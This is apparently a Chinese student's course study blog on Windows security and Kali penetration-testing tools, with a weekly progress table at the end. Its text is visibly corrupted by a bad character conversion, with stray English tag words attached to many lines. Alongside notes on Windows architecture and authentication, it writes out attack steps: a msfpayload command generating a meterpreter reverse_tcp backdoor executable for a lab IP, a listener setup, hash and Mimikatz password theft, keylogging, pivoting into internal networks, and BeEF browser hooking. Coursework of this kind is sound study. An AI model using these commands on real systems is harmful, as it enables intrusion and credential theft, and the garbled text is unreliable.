一、Windows操做系統的發展與現狀php
Windows在桌面操做系統中佔有很是高的市場份額,Windows XP系統在國內仍有大量的用戶html
二、Windows操做系統基本結構web
(1)Windows操做系統內核基本模塊sql
Windows執行體:Windows內核核心文件ntoskrnl.exe的上層接口shell
Windows內核體:Windows內核核心文件ntoskrnl.exe中函數實現與硬件體系結構支持代碼,實現底層的操做系統功能數據庫
設備驅動程序:包括將用戶I/O操做映射爲特定硬件設備I/O請求的硬件設備驅動程序程序,以及文件系統與網絡設備驅動程序。windows
硬件抽象層:hal.dll文件,用於屏蔽Windows內核與平臺硬件差別性的底層代碼.api
Windows窗口與圖形界面接口內核實現代碼:win.32k.sys文件瀏覽器
(2)Windows操做系統在用戶態的代碼模塊安全
系統支持進程:Windows開機自動啓動的系統內建服務進程
環境子系統服務進程:爲操做系統運行環境提供支持的服務進程
服務進程:經過windows的服務管理機制所啓動的一系列系統及網絡服務
用戶應用軟件:在用戶態執行的各種用戶應用軟件
核心子系統DLL:即kernel32.dll/user32.dll/gdi32.dll/avapi32.dll等動態鏈接庫文件,做爲用戶態服務進程與應用軟件和操做系統內核的交互接口,將用戶態程序調用的系統API函數映射到相應的一個或多個Windows內部的系統服務調用。
(3)核心機制
Windows進程和線程管理機制
Windows的網絡機制、
①網卡硬件設備驅動程序,位於OSI物理層
②NDIS庫及miniport驅動程序,位於OSI鏈路層
③TDI傳輸層,網絡協議驅動,位於OSI網絡層與傳輸層
④網絡API DLL 及TDI客戶端,對應OSI會話層與表示層
⑥網絡應用程序與服務進程,對應OSI應用層
一、Windows安全體系結構
Windows操做系統基於引用監控器模型來實現基本的對象安全模型。系統中全部主體對客體的訪問都經過引用監控器做爲中介,由引用監控器根據安全訪問控制策略來進行受權訪問,全部訪問記錄也都由引用監控器生成審計日誌。
Windows操做系統實現基礎的安全機制,其中最核心的是位於內核的SRM安全引用監控器,以及位於用戶態的LSASS安全服務,它們與Winlogon/Netlogon及Eventlog等服務一塊兒,實現了對主體用戶的身份認證機制,對全部資源對象的訪問控制機制,以及對訪問的安全審計機制。
2.Windows身份認證機制
Windows操做系統中以安全主體概念來包含全部進行系統資源訪問請求的實體對象,有用戶、用戶組和計算機三大類,對於每一個安全主體,以時間和空間上都全局惟一的SID安全標識符來進行標識。帳戶權限的根本做用就是限制這些帳戶內運行程序對系統資源對象的訪問。
Windows系統中擁有一些內建帳戶,如擁有最高權限的本地Administrator帳戶,做爲自動運行系統進程環境的SYSTEM/LocalSystem帳戶,具備相對極少權限的Guest匿名訪問用戶,以及IUSR_Machinename IIS服務的匿名網絡訪問帳戶等。而這些帳戶在黑客眼中,本地Administrator和SYSTEM帳戶擁有最高的權限,是他們攻擊的終極目標。
Windows系統的內建用戶組包括:本地最高權限用戶組Administrators、具備單一方面系統權限的Account/Backup/Server/Print Operators等操做組、用於容納服務帳戶的Network Service與Local Service用戶組,以及全部用戶帳戶所在的Users組等。 Windows用戶帳戶的口令字通過加密處理以後被保存於SAM或者活動目錄AD中,其中本地用戶帳戶口令信息通過不可逆的128位隨機密鑰Hash加密後存儲在SAM文件中,SAM存儲於%systemroot%\system32\config\sam文件系統路徑位置,並在註冊表的HKEY_LOCAL MACHINE\SAM存有副本。
Windows域帳戶口令信息則保存在域控制器的活動目錄AD中,加密方式與單機平臺一致,存儲文件系統位置是域控制器的%systemroot%\ntds\ntds.dit路徑。
Windows支持本地身份認證和網絡身份認證兩種方式,分別對在本地系統登陸和遠程網絡訪問的主主體進行合法性驗證。網絡身份認證過程由LSASS服務的Netlogon模塊主導完成。
Windows進程、GINA圖形化登陸窗口,與LSASS服務經過協做來完成本地身份認證過程。
三、Windows受權與訪問控制機制
Windows受權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。在Windows服務器操做系統中,用戶能夠執行內建的whoami命令來查看當前用戶的訪問令牌信息。Windows對於系統中全部需保護的資源都抽象成對象,具體類型包括文件、目錄、註冊表鍵值、內核對象、同步對象、私有對象、管道、內存、通訊接口等,而對每一個對象會關聯一個SD安全描述符,有如下屬性組成:
圖片897
四、Windows安全審計機制
系統審計策略在本地安全策略中由系統管理員定義,來肯定系統對哪些事件進行記錄。
五、Windows的其餘安全機制
身份認證、受權與訪問控制以及安全審計是三個基本安全功能。保護Windows系統安全穩定運行最爲關鍵的三項安全措施——防火牆、補丁自動更新以及病毒防禦。除安全中心以外,Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等
一、Windows系統的安全漏洞生命週期
系統安全的本質核心在於安全漏洞、滲透攻擊及安全檢測防護機制之間的攻防博弈與競賽。
①漏洞掃描測試
②查找針對發現漏洞的滲透代碼
③實施滲透測試
使用Metasploit軟件實施滲透測試:Metasploit軟件採用開發框架和模塊組建的可擴展模型,以Ruby語言編寫的Metasploit Framework(MSF)庫做爲整個軟件的基礎核心,爲滲透測試組建的開發與測試提供平臺;模塊組建是真正實施滲透攻擊的代碼,包括利用安全漏洞的Exploits模塊,進行掃描、查點等其餘輔助任務的Auxiliary模塊,在目標系統上植入和運行的Shellcode攻擊負載Payloads模塊,對攻擊負載進行編碼以躲避檢測的Encoders模塊,以及對攻擊負載進行填充的Nops模塊;Metasploit提供多種用戶接口,包括Console交互終端、命令行程序運行、Web交互界面以及GUI圖形化界面;Metasploit還提供了API接口及插件支持,來支持第三方在MSF基礎上開發擴展模塊,好比自動化的滲透測試例程等等。
二、Windows遠程口令猜想與破解攻擊
三、Windows網絡服務遠程滲透攻擊
Windows操做系統默認開放135(TCP),137(UDP),139(TCP)與445(TCP)端口,對應的網絡服務爲MSRPC與過程調用服務,NetBIOS網絡基本輸入輸出系統服務和SMB文件與打印機共享服務。
一、Windows本地特權提高
終極特權:Administrator或者Local System帳戶。從受限用戶權限嘗試得到特權帳戶的攻擊技術也被稱爲特權提高。
二、Windows敏感信息竊取
三、Windows消蹤滅跡
四、Windows遠程控制與後門程序
參考資料
http://blog.sina.com.cn/s/blog_acdeaa0901017irl.html
漏洞檢測和利用工具
1.searchsploitl漏洞檢索工具,這個項目是由Offensive Security發起的、基於exploit database官方漏洞數據庫源的漏洞搜索工具,能夠直接在終端搜索漏洞相關信息,如漏洞簡介和漏洞驗證/利用腳本。列出全部文件
列出了全部漏洞和對應的文件地址
從目錄中進入漏洞對應的相對地址
用到指令 : cat php/webapps/6.php
搜索windows上iis服務的遠程漏洞:root@localhost:~# searchsploit windows iis remote
2.pattern creat
在緩衝區溢出時可使用這個命令,例pattern create 1000 a就是能夠輸出1000個a
3.ikat
網絡漏洞掃描工具,能夠開一個端口和IP地址,一旦有漏洞的主機經過這個端口掃描它,就會中招,並植入一個shellcode。等待目標訪問中招
4.Termineter 旨在評估智能電錶的安全性,Python Smart Meter Testing Framework。
## 27. 漏洞利用之Metasploit基礎總結 ##
Metasploit在滲透測試中常常能夠用到,包含了不少工具,這些工具造成一個完整的攻擊框架。
在Kali中使用metaaploie,須要先開啓PostgreSQL數據庫服務和metasploit服務,而後就能夠完整的利用msf數據查詢exploit和記錄。
service postgresql start service metasploit start
若是不想每次開機都手工啓動服務,能夠配置隨系統啓動。
update-rc.d postgresql enable update-rc.d metasploit enable
2、路徑介紹
Kali中msf的路徑爲/usr/share/metasploit-framework
encoders:供msfencode編碼工具使用,具體可使用
msfencode –l
post:後滲透階段塊,在得到meterpreter的shell以後可使用攻擊代碼。好比經常使用的hashdump、arp_scanner就在這裏。
三、基本命令
msfpayload:用來生成payload或者shellcode
搜索的時候能夠用msfpayload -l |grep "windows"這樣的命令查詢。-o 選項能夠列出payload所需的參數
msfencode:msf中的編碼器,早期爲了編碼繞過AV,如今經常使用msfpayload與他編碼避免exploit的壞字符串。
msfconsole:開啓metasploit的concle最經常使用的命令。
四、測試示例:發現漏洞,搜索exploit
前期經過掃描的值目標21端口vsftp服務版本爲2.3.4,使用msfconsole打開msf的命令行版本,經過search語句搜索是否有漏洞。
這個版本沒有發現漏洞。
meterpreter 是metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出成功後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個meterpretershell.
meterpreter做爲後滲透模塊有多中類型,而且命令由核心命令和擴展庫命令組成,極大地豐富了攻擊方式,其有不少有用的功能,如,添加一個用戶,隱藏一些東西,打開shell,獲得用戶密碼,上傳下載遠程主機的文件,運行cmd.exe,捕獲屏幕,獲得遠程控制權,捕獲按鍵信息,清除應用程序,顯示遠程主機的系統信息,顯示遠程及其的網絡接口和IP地址等信息。
常見的命令:
background:將當前會話放置後臺
load/use:加載模塊
interact:切換進一個信道
migrate:遷移進程
run:執行一個已有的模塊,這裏要說的是輸入run後按兩下tab,會列出全部的已有的腳本。
resource:執行一個已有的rc腳本經常使用的meterpreter類型爲:payload/windows/meterpreter/reverse_tcp
攻擊步驟:
一、生成Meterpreter後門 :命令:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.129.200 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe
當前kali的IP地址爲:192.168.129.200
二、打開MSF,開啓監聽,選擇exploit/multi/handler
確保打開
三、在目標機器上執行door.exe
四、經過help命令查看可執行的命令
五、常見命令使用,包括系統信息,抓取屏幕截圖與抓取HASH等。
六、目錄瀏覽
七、鍵盤監聽
八、擴展工具,load/use以後再輸入help,就能夠了看到有關這個模塊的命令的說明了
九、擴展工具之Minikatz,抓取本地密碼明文
在跳板獲取必定權限後須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,藉助msf已經獲得的Meterpreter後門,可使系列的操做更容易。
一、查看當前網卡、網段信息。ifconfig
二、添加路由表
run autoroute -s 10.0.0.1
可使用msf中的模塊跨網段攻擊或掃描。可經過腳本autoroute快速添加。
三、開socket代理,經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,sqlmap,nmap使用。經過代理便可訪問內網計算機。
四、經過background和session -i能夠自由切換進入session。
五、輸入run能夠看到在meterpreter上能夠作的不少命令。
六、經過run post/能夠看到後滲透測試模塊
七、獲取內網信息 run arp_acanner -h
八、也能夠上傳文件,作端口轉發後進行後續測試。
對XSS漏洞須要強大框架的支持,如網上的XSS平臺。在Kali下,BeeF是一個不遜色於XSS平臺的工具。Beef是瀏覽器攻擊框架的簡稱,是一款專一於瀏覽器端的滲透測試工具。官網 http://beefproject.com/
一、命令行下啓動 beef beef-xss 此時瀏覽器自動訪問此頁面:http://127.0.0.1:3000/ui/authentication 使用默認用戶名beef與默認密碼beef登陸:
左側爲目標的瀏覽器
二、假設被測試主機因爲XSS漏洞請求到 http://192.168.129.200:3000/demos/basic.html
出現拒絕訪問的狀況,以後就沒有成功。。也是很無奈。
左側online browsers出現新的選項,其Current Browser中包括瀏覽器名稱、版本、操做系統版本等。
三、HOOK持續的時間爲關閉測試頁面爲止,在此期間,至關於被控制了,能夠發送攻擊命令,在Commands模塊,咱們能夠完成不少任務:
其中,四種顏色分別表示:
選取MISC下Raw JavaScript模塊做爲測試用例
執行,查看返回結果,成功則顯示
四、代理Proxy功能
選中目標主機,點右鍵,在菜單中選中Use as Proxy;而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。
學習進度條
博客量(新增/累計) | 學習時間(新增/累計) | 本週學習收穫 | |
---|---|---|---|
目標 | 20 | 200小時 | 完成每週做業 |
第1~5周 | 6/6 | 65h/65h | kali的使用及攻防一些基本知識 |
第6周 | 1/7 | 16h/81h | 對傳輸層的安全結構有了深入的瞭解,學習使用kali一些工具 |
第7周 | 1/8 | 14h/95h | 瞭解Windows操做系統攻防,學習使用metaspoitable |